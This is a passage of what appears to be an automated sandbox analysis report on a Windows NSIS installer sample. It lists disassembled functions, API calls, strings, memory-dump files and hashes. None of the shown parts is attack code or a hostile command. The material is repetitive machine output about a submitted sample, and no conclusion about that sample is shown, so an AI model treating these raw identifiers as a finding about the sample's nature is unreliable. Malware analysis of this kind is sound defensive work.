                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042777E,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                                    • String ID: F$A
                                                                                                                                                                                                                                                                                                    • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                                                    • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                                    • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                                                    Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                                    • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                                    • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                                                    Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042777E,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,0042777E,759223A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                                    • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                                    • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                                                    • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                                    • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                                                    Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateInstance
                                                                                                                                                                                                                                                                                                    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                                    • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                                    • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                                                    Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                    • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                                                                                                                                                    Function 0040737E Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                                    • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                                                                                                                                                    Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                                                    • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                                                    • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                                    • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                                                                                    Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                                    • String ID: F$N$open
                                                                                                                                                                                                                                                                                                    • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                    • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                                                    Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
